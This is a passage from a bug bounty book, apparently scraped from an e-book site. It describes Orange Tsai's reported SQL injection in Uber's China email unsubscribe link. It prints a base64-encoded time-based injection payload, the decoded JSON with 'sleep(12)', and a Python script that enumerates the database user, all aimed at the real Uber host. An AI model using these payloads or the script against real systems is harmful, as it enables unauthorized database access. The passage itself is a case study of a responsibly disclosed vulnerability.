- Bug Bounty Hunting Essentials
- Carlos A. Lozano Shahmeer Amir
- 351字
- 2021-06-10 18:35:34
Uber SQL injection
- Title: SQL injection on sctrack.email.uber.com.cn.
- Reported by: Orange.
- Bounty Rewarded: $4,000.
- Web application URL: http://sctrack.email.uber.com.cn.
- Description: Uber is a famous ride-hailing server; it is one of the biggest in the world and is used in a number of cities around the world by people who want to move from one place to another. The reporter in this case, who is Orange Tsai, a famous bug bounty hunter, traveled to China and called an Uber. Uber sends marketing emails to riders based on their location; now. like any rider. the first thing to do is to unsubscribe from that email. That is what Orange did, but bug bounty hunters have keen eyes; Orange observed that the unsubscribe link that he received in China was different from the one he received in normal circumstances. Reviewing the original report, the URL looked something like this: http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==.
The p parameter contains number strings that are sent to the backend server once the link is visited. The character string in p is basically base64-encoded text with a time-based SQL command. But originally, my analysis concludes that the p parameter contains two sections: user_id, which indicated the user identifier, and receiver, which is the receiving email address. Orange identified that he could incorporate a time-based SQL string in the user_id parameter, which looks something like this:
{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
So, the sleep(12) command as the output delays the response by 12 seconds. This is what we call the hello world of proofs of concept. From there on, Orange created a script using which he could enumerate the database name and current user. A snippet from the script is as follows:
base = string.digits + '_-@.' payload = {"user_id": 5755, "receiver": "blog.orange.tw"} for l in range(0, 30): for i in 'i'+base: payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i) new_payload = json.dumps(payload) new_payload = b64encode(new_payload) r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload))
Basically, what the script does is craft a time-based payload and send an HTTP request to the target server, which returns the current user and the database in the response, as follows:
sendcloud_w@10.9.79.210 sendcloud
- 腦洞大開(kāi):滲透測(cè)試另類實(shí)戰(zhàn)攻略
- Kali Linux Social Engineering
- 網(wǎng)絡(luò)安全保障能力研究
- .NET安全攻防指南(上冊(cè))
- ARM匯編與逆向工程:藍(lán)狐卷·基礎(chǔ)知識(shí)
- Falco云原生安全:Falco原理、實(shí)踐與擴(kuò)展
- 學(xué)電腦安全與病毒防范
- CTF快速上手:PicoCTF真題解析(Web篇)
- 數(shù)字政府網(wǎng)絡(luò)安全合規(guī)性建設(shè)指南:密碼應(yīng)用與數(shù)據(jù)安全
- Web安全攻防從入門(mén)到精通
- 隱私保護(hù)機(jī)器學(xué)習(xí)
- Real-World SRE
- CTF網(wǎng)絡(luò)安全競(jìng)賽入門(mén)教程
- Python Penetration Testing Essentials
- 精通Metasploit滲透測(cè)試(第3版)